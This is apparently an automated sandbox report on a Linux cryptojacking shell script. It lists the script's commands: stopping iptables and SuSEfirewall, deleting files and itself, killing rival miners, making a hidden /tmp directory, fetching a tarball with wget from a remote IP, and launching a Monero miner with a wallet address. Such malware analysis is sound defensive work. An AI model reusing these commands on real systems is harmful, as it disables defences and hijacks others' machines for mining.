Loading ...

Analysis Report L1fyFAYhE5

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:678655
Start date:03.10.2018
Start time:10:48:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:L1fyFAYhE5
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal60.troj.evad.mine.lin@0/0@0/0

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Found strings related to Crypto-MiningShow sources
Source: L1fyFAYhE5String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x
Source: L1fyFAYhE5String found in binary or memory: ./999 -a cryptonight -o xmr -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x -B
Source: L1fyFAYhE5String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.100:44274 -> 115.236.92.99:54321
Tries to stop the "iptables" serviceShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 18102)Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Urls found in memory or binary dataShow sources
Source: L1fyFAYhE5String found in binary or memory: http://115.236.92.99:54321/mall.tar.gz

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: service iptables stop
Source: Initial samplePotential command found: rm -f /tmp/httpdlog/*.gz
Source: Initial samplePotential command found: rm -f *.gz
Source: Initial samplePotential command found: rm -f *.sh
Source: Initial samplePotential command found: rm -f $0
Source: Initial samplePotential command found: killall -9 daemon.armv4l.mod
Source: Initial samplePotential command found: killall -9 daemon.i686.mod
Source: Initial samplePotential command found: killall -9 daemon.mips.mod
Source: Initial samplePotential command found: killall -9 daemon.mipsel.mod
Source: Initial samplePotential command found: killall -9 test.mod
Source: Initial samplePotential command found: killall -9 btminerd
Source: Initial samplePotential command found: killall -9 os64
Source: Initial samplePotential command found: killall -9 os32
Source: Initial samplePotential command found: killall -9 xptminer2
Source: Initial samplePotential command found: killall -9 xptminer
Source: Initial samplePotential command found: killall -9 minerd
Source: Initial samplePotential command found: killall -9 mstrie
Source: Initial samplePotential command found: killall -9 mstxcn
Source: Initial samplePotential command found: killall -9 mstbit
Source: Initial samplePotential command found: killall -9 mstbtc
Source: Initial samplePotential command found: killall -9 ethermine
Source: Initial samplePotential command found: killall -9 zcash
Source: Initial samplePotential command found: killall -9 xxj
Source: Initial samplePotential command found: killall -9 yam
Source: Initial samplePotential command found: killall -9 metacity
Source: Initial samplePotential command found: killall -9 nautilus
Source: Initial samplePotential command found: rm -f /tmp/.httpdlog*.gz
Source: Initial samplePotential command found: echo "yes"
Source: Initial samplePotential command found: mkdir /tmp/.httpdlog
Source: Initial samplePotential command found: cd /tmp/.httpdlog
Source: Initial samplePotential command found: wget http://115.236.92.99:54321/mall.tar.gz
Source: Initial samplePotential command found: tar zxvf mall.tar.gz
Source: Initial samplePotential command found: chmod 777 m7xmr
Source: Initial samplePotential command found: chmod 777 minerm
Source: Initial samplePotential command found: chmod 777 mstxmr
Source: Initial samplePotential command found: chmod 777 ./m7xmr
Source: Initial samplePotential command found: chmod 777 ./minerm
Source: Initial samplePotential command found: chmod 777 ./mstxmr
Source: Initial samplePotential command found: chmod 777 999
Source: Initial samplePotential command found: chmod 777 ALib
Source: Initial samplePotential command found: chmod 777 ./999
Source: Initial samplePotential command found: chmod 777 ./ALib
Source: Initial samplePotential command found: echo "ok"
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.mine.lin@0/0@0/0

Persistence and Installation Behavior:

barindex
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 18010)Rm executable: /bin/rm -> rm -f /tmp/httpdlog/*.gz
Source: /bin/bash (PID: 18015)Rm executable: /bin/rm -> rm -f *.gz
Source: /bin/bash (PID: 18020)Rm executable: /bin/rm -> rm -f *.sh
Source: /bin/bash (PID: 18032)Rm executable: /bin/rm -> rm -f /tmp/L1fyFAYhE5
Tries to stop the "iptables" serviceShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Creates hidden files and/or directoriesShow sources
Source: /bin/mkdir (PID: 18101)Directory: /tmp/.httpdlog
Enumerates processes within the "proc" file systemShow sources
Source: /bin/ps (PID: 18040)File opened: /proc/17200/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17200/status
Source: /bin/ps (PID: 18040)File opened: /proc/17200/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17321/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17321/status
Source: /bin/ps (PID: 18040)File opened: /proc/17321/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17289/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17289/status
Source: /bin/ps (PID: 18040)File opened: /proc/17289/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17284/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17284/status
Source: /bin/ps (PID: 18040)File opened: /proc/17284/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2396/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2396/status
Source: /bin/ps (PID: 18040)File opened: /proc/2396/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17160/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17160/status
Source: /bin/ps (PID: 18040)File opened: /proc/17160/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17161/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17161/status
Source: /bin/ps (PID: 18040)File opened: /proc/17161/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1180/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1180/status
Source: /bin/ps (PID: 18040)File opened: /proc/1180/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17208/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17208/status
Source: /bin/ps (PID: 18040)File opened: /proc/17208/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17329/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17329/status
Source: /bin/ps (PID: 18040)File opened: /proc/17329/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/16875/stat
Source: /bin/ps (PID: 18040)File opened: /proc/16875/status
Source: /bin/ps (PID: 18040)File opened: /proc/16875/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17204/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17204/status
Source: /bin/ps (PID: 18040)File opened: /proc/17204/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2308/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2308/status
Source: /bin/ps (PID: 18040)File opened: /proc/2308/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17206/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17206/status
Source: /bin/ps (PID: 18040)File opened: /proc/17206/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/10/stat
Source: /bin/ps (PID: 18040)File opened: /proc/10/status
Source: /bin/ps (PID: 18040)File opened: /proc/10/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/11/stat
Source: /bin/ps (PID: 18040)File opened: /proc/11/status
Source: /bin/ps (PID: 18040)File opened: /proc/11/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17211/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17211/status
Source: /bin/ps (PID: 18040)File opened: /proc/17211/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/12/stat
Source: /bin/ps (PID: 18040)File opened: /proc/12/status
Source: /bin/ps (PID: 18040)File opened: /proc/12/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17179/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17179/status
Source: /bin/ps (PID: 18040)File opened: /proc/17179/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/13/stat
Source: /bin/ps (PID: 18040)File opened: /proc/13/status
Source: /bin/ps (PID: 18040)File opened: /proc/13/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17334/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17334/status
Source: /bin/ps (PID: 18040)File opened: /proc/17334/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/14/stat
Source: /bin/ps (PID: 18040)File opened: /proc/14/status
Source: /bin/ps (PID: 18040)File opened: /proc/14/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/9475/stat
Source: /bin/ps (PID: 18040)File opened: /proc/9475/status
Source: /bin/ps (PID: 18040)File opened: /proc/9475/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17214/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17214/status
Source: /bin/ps (PID: 18040)File opened: /proc/17214/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/15/stat
Source: /bin/ps (PID: 18040)File opened: /proc/15/status
Source: /bin/ps (PID: 18040)File opened: /proc/15/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/16/stat
Source: /bin/ps (PID: 18040)File opened: /proc/16/status
Source: /bin/ps (PID: 18040)File opened: /proc/16/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17/status
Source: /bin/ps (PID: 18040)File opened: /proc/17/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/18/stat
Source: /bin/ps (PID: 18040)File opened: /proc/18/status
Source: /bin/ps (PID: 18040)File opened: /proc/18/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17210/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17210/status
Source: /bin/ps (PID: 18040)File opened: /proc/17210/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/19/stat
Source: /bin/ps (PID: 18040)File opened: /proc/19/status
Source: /bin/ps (PID: 18040)File opened: /proc/19/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17170/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17170/status
Source: /bin/ps (PID: 18040)File opened: /proc/17170/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1194/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1194/status
Source: /bin/ps (PID: 18040)File opened: /proc/1194/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1/status
Source: /bin/ps (PID: 18040)File opened: /proc/1/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2/status
Source: /bin/ps (PID: 18040)File opened: /proc/2/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2315/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2315/status
Source: /bin/ps (PID: 18040)File opened: /proc/2315/cmdline
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 18041)Grep executable: /bin/grep -> grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z
Source: /bin/bash (PID: 18042)Grep executable: /bin/grep -> grep -v grep
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 18101)Mkdir executable: /bin/mkdir -> mkdir /tmp/.httpdlog
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/bash (PID: 18040)Ps executable: /bin/ps -> ps -ef
Executes the "systemctl" command used for controlling the systemd system and service managerShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable: /bin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17731)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 17733)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 17791)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 17792)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 17796)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 17803)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 17823)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 17834)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 17838)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 17847)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 17858)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 17865)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 17874)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 17883)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 17895)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 17903)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 17910)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 17921)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 17932)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 17941)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 17950)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 17954)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 17961)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 17972)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 17987)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 17993)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 18102)Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Reads system information from the proc file systemShow sources
Source: /bin/ps (PID: 18040)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 18040)Reads from proc file: /proc/stat

Hooking and other Techniques for Hiding and Protection:

barindex
Sample deletes itselfShow sources
Source: /bin/rm (PID: 18032)File: /tmp/L1fyFAYhE5


Runtime Messages

Command:bash "/tmp/L1fyFAYhE5"
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
Standard Error:/tmp/L1fyFAYhE5: line 1: #!/bin/bash: No such file or directory
/tmp/L1fyFAYhE5: line 2: /etc/init.d/iptables: No such file or directory
Failed to stop iptables.service: Unit iptables.service not loaded.
/tmp/L1fyFAYhE5: line 4: SuSEfirewall2: command not found
/tmp/L1fyFAYhE5: line 5: reSuSEfirewall2: command not found
--2018-10-03 12:49:11-- http://115.236.92.99:54321/mall.tar.gz

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 678655 Sample: L1fyFAYhE5 Startdate: 03/10/2018 Architecture: LINUX Score: 60 38 115.236.92.99, 54321 CHINANET-BACKBONENo31Jin-rongStreetCN China 2->38 40 Found strings related to Crypto-Mining 2->40 9 bash 2->9         started        signatures3 42 Detected TCP or UDP traffic on non-standard ports 38->42 process4 process5 11 bash service systemctl 9->11         started        14 bash rm 9->14         started        16 bash rm 9->16         started        18 9 other processes 9->18 signatures6 44 Tries to stop the "iptables" service 11->44 20 service 11->20         started        22 service basename 11->22         started        24 service basename 11->24         started        32 25 other processes 11->32 46 Sample deletes itself 14->46 48 Executes the "rm" command used to delete files or directories 14->48 26 bash ps 18->26         started        28 bash grep 18->28         started        30 bash grep 18->30         started        process7 process8 34 service systemctl 20->34         started        36 service sed 20->36         started       

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxubuntu1
  • bash (PID: 17713, Parent: 17667, MD5: 5e666695cf08d1638bb85684e30185ee)
    • bash New Fork (PID: 17726, Parent: 17713)
    • bash New Fork (PID: 17727, Parent: 17713)
    • bash New Fork (PID: 17728, Parent: 17713)
    • service (PID: 17728, Parent: 17713, MD5: 81c4fe604ec67916db7b223725e5a9c6)
      • service New Fork (PID: 17729, Parent: 17728)
      • basename (PID: 17729, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17730, Parent: 17728)
      • basename (PID: 17730, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17731, Parent: 17728)
      • systemctl (PID: 17731, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17732, Parent: 17728)
        • service New Fork (PID: 17733, Parent: 17732)
        • systemctl (PID: 17733, Parent: 17732, MD5: b08096235b8c90203e17721264b5ce40)
        • service New Fork (PID: 17734, Parent: 17732)
        • sed (PID: 17734, Parent: 17732, MD5: c1a00c583ba08e728b10f3f46f5776d6)
      • service New Fork (PID: 17791, Parent: 17728)
      • systemctl (PID: 17791, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17792, Parent: 17728)
      • systemctl (PID: 17792, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17796, Parent: 17728)
      • systemctl (PID: 17796, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17803, Parent: 17728)
      • systemctl (PID: 17803, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17823, Parent: 17728)
      • systemctl (PID: 17823, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17834, Parent: 17728)
      • systemctl (PID: 17834, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17838, Parent: 17728)
      • systemctl (PID: 17838, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17847, Parent: 17728)
      • systemctl (PID: 17847, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17858, Parent: 17728)
      • systemctl (PID: 17858, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17865, Parent: 17728)
      • systemctl (PID: 17865, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17874, Parent: 17728)
      • systemctl (PID: 17874, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17883, Parent: 17728)
      • systemctl (PID: 17883, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17895, Parent: 17728)
      • systemctl (PID: 17895, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17903, Parent: 17728)
      • systemctl (PID: 17903, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17910, Parent: 17728)
      • systemctl (PID: 17910, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17921, Parent: 17728)
      • systemctl (PID: 17921, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17932, Parent: 17728)
      • systemctl (PID: 17932, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17941, Parent: 17728)
      • systemctl (PID: 17941, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17950, Parent: 17728)
      • systemctl (PID: 17950, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17954, Parent: 17728)
      • systemctl (PID: 17954, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17961, Parent: 17728)
      • systemctl (PID: 17961, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17972, Parent: 17728)
      • systemctl (PID: 17972, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17987, Parent: 17728)
      • systemctl (PID: 17987, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17993, Parent: 17728)
      • systemctl (PID: 17993, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
    • systemctl (PID: 17728, Parent: 17713, MD5: b08096235b8c90203e17721264b5ce40)
    • bash New Fork (PID: 18003, Parent: 17713)
    • bash New Fork (PID: 18007, Parent: 17713)
    • bash New Fork (PID: 18010, Parent: 17713)
    • rm (PID: 18010, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18015, Parent: 17713)
    • rm (PID: 18015, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18020, Parent: 17713)
    • rm (PID: 18020, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18032, Parent: 17713)
    • rm (PID: 18032, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18034, Parent: 17713)
      • bash New Fork (PID: 18040, Parent: 18034)
      • ps (PID: 18040, Parent: 18034, MD5: 37339e5441057d422e61e8a471505337)
      • bash New Fork (PID: 18041, Parent: 18034)
      • grep (PID: 18041, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
      • bash New Fork (PID: 18042, Parent: 18034)
      • grep (PID: 18042, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
    • bash New Fork (PID: 18101, Parent: 17713)
    • mkdir (PID: 18101, Parent: 17713, MD5: a97f666f21c85ec62ea47d022263ef41)
    • bash New Fork (PID: 18102, Parent: 17713)
    • wget (PID: 18102, Parent: 17713, MD5: 458ce58ac4b1aac3eafc287fa46bf92d)
  • cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://115.236.92.99:54321/mall.tar.gzL1fyFAYhE5false
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPCountryFlagASNASN NameMalicious
    115.236.92.99China
    4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue

    Static File Info

    General

    File type:UTF-8 Unicode (with BOM) text
    Entropy (8bit):5.528162830997711
    TrID:
    • Text - UTF-8 encoded (3003/1) 100.00%
    File name:L1fyFAYhE5
    File size:2014
    MD5:94bfedc1dd3a8e3760fca3229a573464
    SHA1:483573dbbd40e0af67e18b67105cbd4af7d2e5f9
    SHA256:e094df700e7c3523fffcaafe55b26ec52dc0c123a5e2e0779904b42f9d8d0739
    SHA512:70a6621079189ed11a61495aeeb84f63ad29f39689f312334efad7174b44e815fd232cb599e369bbd5f2050a47000f337a1f9236d45ed6a63139d6db9d713c4c
    File Content Preview:...#!/bin/bash./etc/init.d/iptables stop.service iptables stop.SuSEfirewall2 stop.reSuSEfirewall2 stop.rm -f /tmp/httpdlog/*.gz.rm -f *.gz.rm -f *.sh.rm -f $0.ret=`ps -ef|grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8Y

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Okt 3, 2018 10:49:13.030000925 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:14.026628017 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:16.030488968 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:20.038564920 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:28.054533958 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:44.070491076 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:50:16.134579897 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:52:23.213716030 MESZ6081553192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.214348078 MESZ3902953192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.226145029 MESZ53608158.8.8.8192.168.1.100
    Okt 3, 2018 10:52:23.226608992 MESZ53390298.8.8.8192.168.1.100

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Okt 3, 2018 10:52:23.213716030 MESZ6081553192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.214348078 MESZ3902953192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.226145029 MESZ53608158.8.8.8192.168.1.100
    Okt 3, 2018 10:52:23.226608992 MESZ53390298.8.8.8192.168.1.100

    System Behavior